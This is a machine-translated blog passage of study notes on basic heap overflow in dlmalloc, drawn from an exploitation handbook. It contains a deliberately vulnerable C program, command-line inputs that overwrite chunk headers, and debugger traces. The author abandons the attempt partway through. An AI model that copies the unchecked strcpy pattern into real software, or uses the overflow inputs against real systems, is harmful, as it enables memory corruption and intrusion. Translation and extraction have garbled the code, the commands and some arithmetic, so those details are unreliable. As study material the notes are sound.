Shellcode 5: Heap Overflow

Source: Internet
Author: User

Statement: The main content is from the shellcoder's handbook, which extracts Important Notes and adds some personal understanding. If there is something wrong, be sure to point it out.

Almost all malloc implementations use metadata to store the location, size, or special data related to small blocks. Dlmalloc stores the data in buckets, and some malloc stores the data in a balance tree structure. These metadata are generally stored in two places: malloc implements the global variables used by the user, and the pre/post location of the memory block allocated to the user.

Basic Heap Overflow

The basic principle of most heap overflow is as follows: the heap and stack are similar, including both data information and maintenance information used to control the program to understand the data. The skill we need to master is to use malloc and free to write one or two words into the memory address we can control.

Let's first look at a program that will generate a heap overflow:

//file: basicheap.c#include <stdio.h>int main(int argc, char *argv[]){    char *buf;    char *buf2;    buf = (char *)malloc(1024);    buf2 = (char *)malloc(1024);    printf("buf=%p, buf2=%p/n", buf, buf2);        strcpy(buf, argv[1]);    free(buf2);}

The program allocates two buffers that are adjacent to each other in the memory. When the first buffer overflows, the metadata in the second buffer is rewritten. Compile and use ltrace to trace and run:

sep@sep:~/project/shellcode$ ltrace ./basicheap `perl -e 'print "A" x 5000'`__libc_start_main(0x8048444, 2, 0xbfb19a24, 0x80484d0, 0x80484c0 <unfinished ...>malloc(1024)                                                        = 0x804a008malloc(1024)                                                        = 0x804a410printf("buf=%p, buf2=%p/n", 0x804a008, 0x804a410buf=0x804a008, buf2=0x804a410)                   = 30strcpy(0x804a008, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...)            = 0x804a008free(0x804a410 <unfinished ...>--- SIGSEGV (Segmentation fault) ---+++ killed by SIGSEGV +++

Segmentation fault occurs. The first addresses of the two buffers are 0x804a008 and 0x804a410, respectively, and the distance between them is 0x804a0000-0x804a008 = 1032 = 1024 + 8, it is equal to the buffer length of 1024 bytes plus 8 bytes of the storage block information header. When strcpy imports 5000 bytes of data to the Buf, a heap overflow occurs, thus rewriting the header block information of the buf2. Then, the free (buf2) operation will cause a segment failure.

For the use of tools such as strace and ltrace, see: http://www.ibm.com/developerworks/cn/linux/l-tsl/

How to cheat malloc and make it process the modified memory block is the key to the problem. First, we need to clear the previous-in-use bits of the rewritten block header, and then set the length of the "first block" to a negative number, in this way, we will run the buffer to define our own blocks.

The implementation of malloc, including dlmalloc in Linux, stores additional information in idle blocks. The first four bytes of the idle block are the forward pointer, And the next four bytes are a backward pointer. These two pointers hold the idle block on the two-way linked list. In the insert and delete operations on a two-way linked list, we can use these pointers to rewrite the data in any memory address.

./Basicheap 'python-C' print "A" * 1024 + "/xFF" + "/xf0/xFF "''

After the command is run, the Buf overflow in the heap buffer, and the eight bytes in the buf2 header are changed to 0xfffffff0 and 0 xffffffff.

Find the buffer length. In the above example, we can usually see the starting position of the buffer (starting with a) in the memory. The data before this word is the buffer length. (GDB) x/XW buf-4 display length is 1033, it is equal to the length of the Buf 1024 plus the 8 bytes of the storage block information, and the last 1 bit indicates whether there is another block before the block. If it is set to a bit (like in this example), it indicates that the header does not store the size of the previous block. If it is set to 0, it indicates that there is another block before the block, and the data in the buf-8 is the size of the previous block. The second-to-last sign indicates whether the block is allocated by NMAP.

SEP @ Sep :~ /Project/shellcode $ GDB. /basicheapgnu GDB 6.4.90-debiancopyright (c) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you arewelcome to change it and/or distribute copies of it under certain conditions. type "show copying" to see the conditions. there is absolutely no warranty for GDB. type "show warranty" for details. this GDB was configured I486-linux-gnu "... using host libthread_db library "/lib/i686/cmov/libthread_db.so.1 ". (GDB) r 'python-C' print "A" * (1024) + "/xfc/xFF" + "/xf0/xFF" + "aaaaabcdefgh" ''starting program: /home/SEP/project/shellcode/basicheap 'python-C' print "A" * (1024) + "/xfc/xFF" + "/xf0/xFF" + "aaaaabcdefgh" ''failed to read a valid object file image from memory. buf = 0x804a008, buf2 = 0x804a410; Output the first address of the two buffers *** glibc detected ***/home/SEP/project/shellcode/basicheap: Free (): Invalid Pointer: 0x0804a410 **** ======= backtrace: =============/lib/i686/cmov/libc. so.6 [0xb7ecc764]/lib/i686/cmov/libc. so.6 (cfree + 0x96) [0xb7ece966]/home/SEP/project/shellcode/basicheap [0x80484b2]/lib/i686/cmov/libc. so.6 (_ libc_start_main + 0xe5) [0xb7e74455]/home/SEP/project/shellcode/basicheap [0x80483b1] ===== Memory Map: ======= 08048000-08049000 R-XP 00000000 30559/home/SEP/project/shellcode/basicheap08049000-0804a000 RW-P 00000000 30559/home/SEP/project/ shellcode/basicheap0804a000-0806b000 RW-P 0804a000 00:00 0 [heap] b7d00000-b7d21000 RW-P b7d00000 00:00 0 b7d21000-b7e00000 --- P b7d21000 00:00 0 b7e48000-b7e54000 R-XP 00000000 08:01 1318/lib/libgcc_s.so.1b7e54000-b7e55000 RW-P rjb000 08:01 131 8/lib/libgcc_s.so.1b7e5d000-b7e5e000 RW-P b7e5d000 00:00 0 b7e5e000-b7fb3000 R-XP 00000000 08:01 11668/lib/i686/cmov/libc-2.7.sob7fb3000-b7fb4000 r -- p 00155000 08:01 11668/lib/i686/cmov/libc-2.7.sob7fb4000-b7fb6000 RW-P 00156000 11668/lib/i686/cmov/libc-2.7.sob7fb6000-b7fb9000 RW-P b7fb6000 0 b7fc0000-b7fc3000 RW-P b7fc0000 0 b7fc3000-b7fc4000 R-XP b7fc3000 0 [vdso] b7fc 4000-b7fde000 R-XP 00000000 08:01 11658/lib/ld-2.7.sob7fde000-b7fe0000 RW-P 0001a000 08:01 11658/lib/ld-2.7.sobf879000-bf88e000 RW-P bf879000 00:00 0 [Stack] Program received signal SIGABRT, aborted.0xb7fc3410 in ?? () (GDB) x/XW 0x804a008-4; print the buf-4 content 0x804a004: 0x00000409; Buf size (GDB) x/XW 0x804a410-8; print the buf2-8 content 0x804a408: 0 xfffffffc; the original should be the size of the previous block, is now rewritten to 0 xfffffffc (GDB) x/XW 0x804a410-4; print the buf2-4 content 0x804a40c: 0xfffffff0; it should have been the size of buf2, and is now changed to 0xfffffff0 (GDB) x/XW 0x804a410; buffer buf2 is filled with the string "aaaaabcdefgh" 0x804a410: 0x41414141 (GDB) x/XW 0x804a410 + 40x804a414: 0x44434241 (GDB)

Here, the test results on my operating system are totally different from those in the original book. Due to the lack of intuitive results from the experiment, and the original writing is very simple and obscure, I am confused about a lot of content, so I will not continue this part here.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.